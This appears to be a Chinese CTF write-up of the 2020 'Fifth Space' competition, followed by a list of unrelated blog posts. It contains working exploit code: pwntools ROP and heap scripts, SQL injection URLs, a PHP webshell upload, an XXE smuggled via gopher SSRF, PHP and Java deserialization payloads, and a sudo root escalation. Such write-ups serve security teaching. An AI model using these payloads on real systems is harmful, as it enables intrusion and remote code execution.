“第五空間”智能安全大賽部分WP

原創 合天智汇 2020-07-02 11:51

第五空間6月24日比賽的部分WP.

目錄

crypto

rosb

rsa共模攻擊,網上找了個板子改了改

rom gmpy2 import *
import libnum


n = 0xa1d4d377001f1b8d5b2740514ce699b49dc8a02f12df9a960e80e2a6ee13b7a97d9f508721e3dd7a6842c24ab25ab87d1132358de7c6c4cee3fb3ec9b7fd873626bd0251d16912de1f0f1a2bba52b082339113ad1a262121db31db9ee1bf9f26023182acce8f84612bfeb075803cf610f27b7b16147f7d29cc3fd463df7ea31ca860d59aae5506479c76206603de54044e7b778e21082c4c4da795d39dc2b9c0589e577a773133c89fa8e3a4bd047b8e7d6da0d9a0d8a3c1a3607ce983deb350e1c649725cccb0e9d756fc3107dd4352aa18c45a65bab7772a4c5aef7020a1e67e6085cc125d9fc042d96489a08d885f448ece8f7f254067dfff0c4e72a63557
e1 = 0xf4c1158f
c1 = 0x2f6546062ff19fe6a3155d76ef90410a3cbc07fef5dff8d3d5964174dfcaf9daa003967a29c516657044e87c1cbbf2dba2e158452ca8b7adba5e635915d2925ac4f76312feb3b0c85c3b8722c0e4aedeaec2f2037cc5f676f99b7260c3f83ffbaba86cda0f6a9cd4c70b37296e8f36c3ceaae15b5bf0b290119592ff03427b80055f08c394e5aa6c45bd634c80c59a9f70a92dc70eebec15d4a5e256bf78775e0d3d14f3a0103d9ad8ea6257a0384091f14da59e52581ba2e8ad3adb9747435e9283e8064de21ac41ab2c7b161a3c072b7841d4a594a8b348a923d4cc39f02e05ce95a69c7500c29f6bb415c11e4e0cdb410d0ec2644d6243db38e893c8a3707
e2 = 0xf493f7d1
c2 = 0xd32dfad68d790022758d155f2d8bf46bb762ae5cc17281f2f3a8794575ec684819690b22106c1cdaea06abaf7d0dbf841ebd152be51528338d1da8a78f666e0da85367ee8c1e6addbf590fc15f1b2182972dcbe4bbe8ad359b7d15febd5597f5a87fa4c6c51ac4021af60aeb726a3dc7689daed70144db57d1913a4dc29a2b2ec34c99c507d0856d6bf5d5d01ee514d47c7477a7fb8a6747337e7caf2d6537183c20e14c7b79380d9f7bcd7cda9e3bfb00c2b57822663c9a5a24927bceec316c8ffc59ab3bfc19f364033da038a4fb3ecef3b4cb299f4b600f76b8a518b25b576f745412fe53d229e77e68380397eee6ffbc36f6cc734815cd4065dc73dcbcb


s = gcdext(e1, e2)
s1 = s[1]
s2 = -s[2]


c2 = invert(c2, n)
m = (pow(c1,s1,n) * pow(c2 , s2 , n)) % n
print(hex(m))
s=hex(m)[2:]
result=""
for i in range(len(s)/2):
    result+=chr(int(s[2*i:2*i+2],16))
print(result[:-64])
# g0od_go0d_stu4y_d4yd4y_Up

re

nop

main函數裏存在三個需要nop的反調試的函數(共五處),nop後的邏輯是:輸入數字,然後通過eax一直加(大約是反調試jump的次數)+0xCCCCCCCC,最後的值用於在函數sub_8048691中patch eaxeax+1的值爲0x90。因此正確的patch才能跳轉到right處,由於中間eax+1有點多不想數b,所以大概算了個值(考慮一下32位溢出),然後前後遍歷了一小段數字,得到flag爲99357990


rev

本意是一個rop導向的逆向題,但寫trace太麻煩了,所以試了下angr的模板,正好可以用,注意一下輸入參數爲argv1

import angr
import sys
import claripy


def main(filepath):
    project = angr.Project(filepath)
    argv1 = claripy.BVS("argv1",100*8)
    init_state = project.factory.entry_state(args=[filepath,argv1])
    sim = project.factory.simgr(init_state)


    find = [0x400481]
    avoid = [0x400471]
    sim.explore(find=find,avoid=avoid)
    if sim.found:
        found=sim.found[0]
        solution = found.solver.eval(argv1, cast_to=bytes)
        print(solution)
    else:
        raise Exception('Could not find the solution')




if __name__=="__main__":
    if(len(sys.argv)!=2):
        print('usage:python angr_basic.py filepath')
    filepath = sys.argv[1]
    main(filepath)
    
# ctf{ropchain_is_g00d}

pwn

twice

第一次溢出一個字節用於泄露canary和棧地址,第二次溢出0x20字節,其中除了填寫canary外,rbp位置存放字符串起始棧地址-8,返回地址填leave ret,這樣就可以多出88字節的ROP。ROP主體爲puts泄露libc地址、readbss(也可以繼續往棧上)寫入system("/bin/sh\x00")的另一段ROP,最後棧轉移,正好`88字節。

from pwn import *
from LibcSearcher import LibcSearcher


e = ELF("./pwn")
libc = e.libc


if args.I:
    context.log_level = 'debug'
if args.R:
    p = remote('121.36.59.116', 9999)
else:
    p = process(e.path)  #, env = {'LD_PRELOAD': LIBC})


p.sendafter(">", "A"*89)


p.recvuntil("A"*89)




canary = u64(p.recv(7).rjust(8, b'\0'))
stack = u64(p.recv(6).ljust(8, b'\0'))
print(hex(canary))
print(hex(stack))


p.recvuntil(">")


pop_rdi_ret = 0x400923
pop_rsi_r15_ret = 0x400921
pop_rsp_13_14_15_ret = 0x40091d
leave_ret = 0x400879
bss = 0x601400


payload = p64(pop_rdi_ret)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(pop_rsi_r15_ret)
payload += p64(bss)
payload += p64(0)
payload += p64(pop_rdi_ret)
payload += p64(0)
payload += p64(e.plt['read'])
payload += p64(pop_rsp_13_14_15_ret)
payload += p64(bss)


print(len(payload))


p.send(payload+p64(canary)+p64(stack-0x18-88-8)+p64(leave_ret))


p.recvline()


puts_addr = u64(p.recv(6).ljust(8, b'\0'))


print(hex(puts_addr))


libcsearch = LibcSearcher('puts', puts_addr)
libcbase = puts_addr - libcsearch.dump('puts')
system_addr = libcbase + libcsearch.dump('system')
binsh_addr = libcbase + libcsearch.dump('str_bin_sh')


p.send(p64(0)*3+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr))


# print(p.pid)
p.interactive()

運行實例:

print(p.pid)

p.interactive()

pwnme

因爲除了off-one-null-byte外更嚴重的是有任意長度堆溢出的操作,一開始想的是使用overlapping,但因爲環境一直搭不起來拿不到unsortedbin的偏移,又看到沒開PIE並且GOT表可寫,所以最後換了unlink來做。unlink後泄露free地址再填入system地址一把梭。

from pwn import *
from LibcSearcher import LibcSearcher


e = ELF("./a.out")
libc = ELF("./lib/libuClibc-1.0.34.so")
# libc = e.libc


if args.I:
    context.log_level = 'debug'
if args.R:
    p = remote('121.36.58.215', 1337)
else:
    p = process(e.path)  #, env = {'LD_PRELOAD': LIBC})


def Show():
    p.sendlineafter(">>> ", '1')


def Add(lenth, tag):
    p.sendlineafter(">>> ", '2')
    p.sendlineafter("Length:", str(lenth))
    p.sendafter("Tag:", tag)


def Change(ind, lenth, tag):
    p.sendlineafter(">>> ", '3')
    p.sendlineafter("Index:", str(ind))
    p.sendlineafter("Length:", str(lenth))
    p.sendafter("Tag:", tag)


def Remove(ind):
    p.sendlineafter(">>> ", '4')
    p.sendlineafter("Tag:", str(ind))


chunk = 0x21068
ptr = chunk+4+8
Add(0x50, 'yuri') # 0
Add(0x100, 'yuri') # 1 
Add(0xf8, 'yuri') # 2
Add(0x50, '/bin/sh\x00') # 3


Change(1, 0x100+4, b'\0'*8 + p32(ptr-3*4) + p32(ptr-2*4) + b'\0'*240 + p32(0x108-2*4))


Remove(2)


Change(1, 7, p32(0x50) + p32(e.got['free'])[:-1])


Show()


p.recvuntil(" : ")
base = u32(p.recv(4)) - libc.symbols['free']


Change(0, 4, p32(base + libc.symbols['system']))


Remove(3)


# print(p.pid)
p.interactive()


運行實例:


of

只給源碼的pwn,先把tcache填滿使得後續堆塊釋放到fastbin,然後利用scanf觸發malloc_consolidate釋放到unsortedbin泄露libc地址,最後便是常規改__free_hook的操作。這裏比較奇怪的是泄露的unsortedbin的地址多了0x100,第一次見這種操作。

from pwn import *
from LibcSearcher import LibcSearcher


# e = ELF("./pwn")
libc = ELF("./libc-2.27.so")


if args.I:
    context.log_level = 'debug'
r = remote('121.36.74.70', 9999)




def allocate(ind):
    r.sendlineafter("Your choice: ", "1")
    r.sendlineafter("Index: ", str(ind))




def delete(ind):
    r.sendlineafter("Your choice: ", "4")
    r.sendlineafter("Index: ", str(ind))


def show(ind):
    r.sendlineafter("Your choice: ", "3")
    r.sendlineafter("Index: ", str(ind))
    r.recvuntil("Content: ")
    return r.recv(0x100-8)


def edit(ind, content):
    r.sendlineafter("Your choice: ", "2")
    r.sendlineafter("Index: ", str(ind))
    r.sendafter("Content: ", content)


for i in range(7):
    allocate(i)


allocate(7)
allocate(8)


for i in range(7):
    delete(i)


delete(7)
for i in range(7):
    allocate(i)
allocate(9) # 7 == 9


for i in range(7):
    delete(i)


delete(7)


r.sendlineafter("Your choice: ", '7'*0x500)


base = u64(show(9)[:8]) - 96 - 0x10 - libc.symbols['__malloc_hook'] - 0x100


free_hook_addr = base + libc.symbols['__free_hook']
system_addr = base + libc.symbols['system']


print(hex(base))


for i in range(7):
    allocate(i)


allocate(7)
delete(7)


edit(9, p64(free_hook_addr-8))
allocate(10)
allocate(10)
edit(10, b'/bin/sh\x00' + p64(system_addr))


delete(10)


r.interactive()



misc

簽到

flag{https://5space.360.cn}


麒麟系統

提權root權限,訪問/root/flag,獲取內容

user:kylin-user pwd:FifthSpace360

118.26.139.133:22IP地址更換118.26.139.133:22

sudo配置不當可以以root權限執行

sudo -u#-1 cat /root/flag


loop

tar和zip循環解壓,用下面的腳本跑五六次差不多能拿到flag的文件

import os
for i in range(100):
    os.system('tar -xvf tarfile')
    os.system('unzip -o zipfile')
# flag{a4944cc1-0e50-44d3-9d85-6c52a3387330}

philosophy

一開始打算當作逆向來做,但使用DIE看時發現資源區段顯示加殼,很可疑。

查看資源區段,果然有FL4G字樣。

因此直接用Resource Hacker查看,發現非常明顯的PNG結構特徵。

提出來改一下PNG頭前四個字節即可看到FLAG


run

很大的run.exewin10桌面顯示是個word,想起來word本來也是壓縮包,解壓了一下拿到一個word和一個小的run.exe,跑了一下發現出來一個tif文件改了後綴以後用ps打開,黑色塊可以移動,移開後得到

而tif文件的最後有run.exe加上的run->njCp1HJBPLVTxcMhUHDPwE7mPW,因此試了下有無flag{}``,有無run->`,最後正確的是

s="flag{njCp1HJBPLVTxcMhUHDPwE7mPW}"
s=list(s)
for i in range(len(s)):
    if(i%2==0):
        s[i]=chr(ord(s[i])+1)
    else:
        s[i]=chr(ord(s[i])-1)
print("".join(s))
# flag{njCp1HJBPLVTxcMhUHDPwE7mPW}

web

hate-php

沒有過濾 ()~直接用取反,unicode字符用url編碼

phpinfo驗證

http://121.36.74.163/?code=(~%8F%97%8F%96%91%99%90)()



system('cat flag.php')


(system)('cat /flag.php')


php > $a = "system";
php > echo urlencode(~$a);
%8C%86%8C%8B%9A%92
php > $a = "cat /flag.php";
php > echo urlencode(~$a);
%9C%9E%8B%DF%D0%99%93%9E%98%D1%8F%97%8F


(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F)








<?php
$flag = 'flag{ecee9b5f24f8aede87cdda995fed079c}';


do you know

index.php的限制條件可以隨意填寫,只要符合條件就可以了

if(!$a_key||!$b_key||!$a_value||!$b_value)
{
        die('我什麼都沒有~');
}
if($a_key==$b_key)
{
    die("trick");
}


if($a_value!==$b_value)
{
        if(count($_GET)!=1)
        {
                die('be it so');
        }
}

foreach循環中會遍歷$_GET並把遍歷最後的值賦給url,此處存在SSRF可以訪問 xxe.php

xxe.php處存在XXE漏洞,但是需要繞過過濾,不過這個過濾只過濾一次,所以直接雙寫就可以了

$data = isset($_POST['data'])?trim($_POST['data']):'';
$data = preg_replace("/file|flag|write|xxe|test|rot13|utf|print|quoted|read|string|ASCII|ISO|CP1256|cs_CZ|en_AU|dtd|mcrypt|zlib/i",'',$data);


問題在於xxe需要post訪問,我們現在有SSRF所以使用gopher可以發出post包

XXE payload

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY a SYSTEM "php://filter/convert.base64-encode/resource=./flflagag.php">]>
<user>&a;</user>


用 gopher 發送
a1=b&a2=b&c=gopher://127.0.0.1:80/_%2550%254f%2553%2554%2520%252f%2578%2578%2565%252e%2570%2568%2570%2520%2548%2554%2554%2550%252f%2531%252e%2531%250d%250a%2548%256f%2573%2574%253a%2520%2531%2532%2537%252e%2530%252e%2530%252e%2531%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%254c%2565%256e%2567%2574%2568%253a%2520%2532%2531%2536%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%2554%2579%2570%2565%253a%2520%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2578%252d%2577%2577%2577%252d%2566%256f%2572%256d%252d%2575%2572%256c%2565%256e%2563%256f%2564%2565%2564%250d%250a%250d%250a%2564%2561%2574%2561%253d%2525%2533%2543%2525%2532%2531%2544%254f%2543%2554%2559%2550%2545%252b%2566%256f%256f%252b%2525%2535%2542%2525%2530%2544%2525%2530%2541%2525%2533%2543%2525%2532%2531%2545%254c%2545%254d%2545%254e%2554%252b%2566%256f%256f%252b%2541%254e%2559%252b%2525%2533%2545%2525%2530%2544%2525%2530%2541%2525%2533%2543%2525%2532%2531%2545%254e%2554%2549%2554%2559%252b%2578%252b%2553%2559%2553%2554%2545%254d%252b%2525%2532%2532%2570%2568%2570%2525%2533%2541%2525%2532%2546%2525%2532%2546%2566%2569%256c%2574%2565%2572%2525%2532%2546%2563%256f%256e%2576%2565%2572%2574%252e%2562%2561%2573%2565%2536%2534%252d%2565%256e%2563%256f%2564%2565%2525%2532%2546%2572%2565%2573%256f%2575%2572%2563%2565%2525%2533%2544%252e%2525%2532%2546%2566%256c%2566%256c%2561%2567%2561%2567%252e%2570%2568%2570%2525%2532%2532%2525%2533%2545%2525%2535%2544%2525%2533%2545%2525%2530%2544%2525%2530%2541%2525%2533%2543%2575%2573%2565%2572%2525%2533%2545%2525%2532%2536%2578%2525%2533%2542%2525%2533%2543%2525%2532%2546%2575%2573%2565%2572%2525%2533%2545%252b%252b%252b%252b%252b%252b%252b%252b

得到flag ,base 解碼一下

PD9waHAKJGZsYWc9J2ZsYWd7NWJjMGJjMjkxZDMyMjQ1MDY3OTg2NmQ1ZGRmMGEzNDZ9JzsK




<?php
$flag='flag{5bc0bc291d322450679866d5ddf0a346}';


美團外賣

源碼www.zip審計發現,daochu.php存在sql語句,並且與login比起來,沒有過濾

http://119.3.183.154/daochu.php?type=1&imei="union%20select%201,2,3,4,5,database()%23


database() == cms


http://119.3.183.154/daochu.php?type=1&imei="union%20select%201,2,3,4,5,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()%23




    <td>admin,content,hint,mac,sms</td>




http://119.3.183.154/daochu.php?type=1&imei="union%20select%201,2,3,4,5,(select+*+from+hint)%23


see_the_dir_956c110ef9decdd920249f5fed9e4427


發現給了路徑,但是暫時還不知道什麼用

繼續審計

發現有ueditor和webuploader,需要結合hint中的路徑訪問

在webuploader裏有preview.php可以上傳圖片

payload

data:image/php4;base64,PD9waHAgc3lzdGVtKCRfR0VUW3hdKTsK


// system($_GET[x])







!!!! Congratulations on infiltrating here, but it's a pity that someone has infiltrated and left a Trojan, do not continue here , please see the e98a4571cf72b798077d12d6c94629.php !!!!!

這裏???啥意思get file。。。我的shell呢?

。。。。。天才出題人

flag{g879aee87y8501c1deab01c7b54f2fa9}

laravel(unsolved)

尋找POP鏈

namespace Symfony\Component\Routing\Loader\Configurator{
    class ImportConfigurator{
        protected $parent;
        protected $route;
        public function __construct($parent,$route){
              $this->parent=$parent;
              $this->route=$route;
        }
    }
}
namespace Faker {
    class Generator {
        protected $formatters = array();


        public function __construct($formatters)
{
            $this->formatters = $formatters;
        }
    }
}




namespace{
    $generator = new Faker\Generator(array("addCollection"=>"system"));
    $exp = new \Symfony\Component\Routing\Loader\Configurator\ImportConfigurator($generator,"cat /flag");
    echo urlencode(serialize($exp));
}



flag{90569859b0164266ef04461bbc1d5cc5}

zzm blog(unsolved)

CVE-2019-12086配合 JDBC autoDeserialize 繞過黑名單

https://www.cnblogs.com/xinzhao/p/11005419.htmlhttps://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf

{"id":["com.mysql.cj.jdbc.admin.MiniAdmin", "jdbc:mysql://ip:port/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections7_ping test.com"]}

CTF實驗室

https://www.hetianlab.com/pages/CTFLaboratory.jsp

歡迎投稿至郵箱:[email protected]

有才能的你快來投稿吧!

投稿細則都在裏面了,點擊查看哦

重金懸賞 | 合天原創投稿漲稿費啦!

點擊這裏提升自己

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Qt/C++音視頻開發72-倍速推流/音視頻同步倍速推流/不改變幀率和採樣率/低倍速和高倍速

一、前言 最近多了個新需求,需要倍速推流,推流界的扛把子obs也有倍速推流功能,最高支持到兩倍速。這裏所說的倍速,當然只限定在文件,只有文件纔可能有倍速功能,因爲也只有文件才能倍速解碼播放。實時視頻流是不可能倍速的,因爲沒有時長,有時長的纔

飛揚青雲 2024-05-05 14:31:43

IDEA 選擇 Maven profile 後不生效

參考:Idea select maven profile sometimes not working 發現切換 profile 後沒有生效。 可以進入運行配置,在 Before launch 中加入 compile 目標。

Higurashi-kagome 2024-05-05 14:27:42

win11關閉自動檢測病毒刪文件

關閉掉保護即可. 有時候莊遊戲, 總是被系統當病毒刪了.

張博的博客 2024-05-05 14:19:42

編程方法學

編程語言Rank https://www.tiobe.com/tiobe-index/ 雷軍代碼:(彙編語言Assembly Language/.ass) https://cloud.tencent.com/developer/art

Qtodd 2024-05-05 14:13:31

.Net 8.0 下的新RPC,IceRPC之如何創建連接connection

作者引言 很高興啊,我們來到了IceRPC之如何創建連接connection,基礎引導,讓自已不在迷茫,快樂的暢遊世界。 如何創建連接connection 學習如何使用IceRPC,創建和接受連接。 連接有什麼用途? 連接在 Ice

xlgwr 2024-05-05 13:54:30

.NET 8 的openEuler 容器鏡像

目前.NET 8的容器鏡像已經支持openEuler,以openEuler爲基礎鏡像的應用鏡像:dotnet-deps、dotnet-runtime 和 dotnet-aspnet。基礎鏡像簡介這裏存放着由openEuler官方提供的容器鏡

張善友 2024-05-05 13:52:30

讓.NET 8 支持 Windows Vista RTM

衆所周知,從 Windows 的每次更新又會新增大量 API,這使得兼容不同版本的 Windows 需要花費很大精力。導致現在大量開源項目已經不再兼容一些早期的 Windows 版本,比如 .NET 8 AOT編譯命令行程序時生成的EXE,

張善友 2024-05-05 13:52:29

千兆寬帶實際網速能到達多少?

背景 在生活中,經常會遇到這樣的問題,我們申請的帶寬是1000M,但實際下載的最高速度只有125MB(1000Mb / 8 = 125MB) 有的人就會問,爲什麼下載速度這麼慢?爲什麼要除以8呢? 對於這個問題,首先要知道,帶寬和網速,他們

翎野 2024-05-05 13:49:29

剝開網線表皮,裏面的8根線分別代表什麼以及作用

 網線是現代網絡通信的核心組成部分,其八根線的作用各有不同。首先,網線由八根細線組成,每根細線都有其特定的功能和作用。 第一根細線: 負責發送數據信號。在計算機網絡通信中,數據的傳輸需要依靠信號來進行。因此,第一根細線的作用就是

翎野 2024-05-05 13:49:29

「 網絡安全術語解讀 」通用平臺枚舉CPE詳解

https://blog.csdn.net/u013129300/article/details/129329786

規格嚴格-功夫到家 2024-05-05 13:43:19

深入學習和理解Django視圖層:處理請求與響應

title: 深入學習和理解Django視圖層:處理請求與響應 date: 2024/5/4 17:47:55 updated: 2024/5/4 17:47:55 categories: 後端開發 tags: Django 請求處

Mifen 2024-05-05 13:38:28

成都 VS 深圳

日常 成都:好多老頭老太太 深圳:咋這個多年輕人 成都:早上公園一堆堆的打太極 深圳:早上公園一堆堆跳廣場舞 成都:一到冬天,天天霧霾 深圳:一年四季碧水藍天 成都:沒有山,山都在西邊去了 深圳:大山小山不少,有山或水必有公園。週末沒事爬爬

hua1989 2024-05-05 13:38:18

如何閱讀 Paper

前言 論文(Paper)通常是新技術、算法、編程方法或軟件工具的首次公佈。通過閱讀論文,我們可以瞭解最新的技術進展,保持自己的技能和知識是最新的。 同時,論文提供了對特定主題深入理解的機會。它們通常包含詳細的理論分析和實驗結果,這有助於深入

mghio 2024-05-05 13:32:48

REACT: SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS

發表時間:2023(ICLR 2023) 文章要點:文章提出一個簡單有效的ReAct框架,將reasoning和action結合,在交互式的環境上進行測試,取得了很好的效果。其中reasoning作爲推理模塊,幫助模型歸納,跟蹤和更新動作規

initial_h 2024-05-05 13:32:27

sysbench的部分基準性能測試學習

sysbench的部分基準性能測試學習 命令 Compiled-in tests: fileio - File I/O test cpu - CPU performance test memory - Memory funct

濟南小老虎 2024-05-05 13:29:27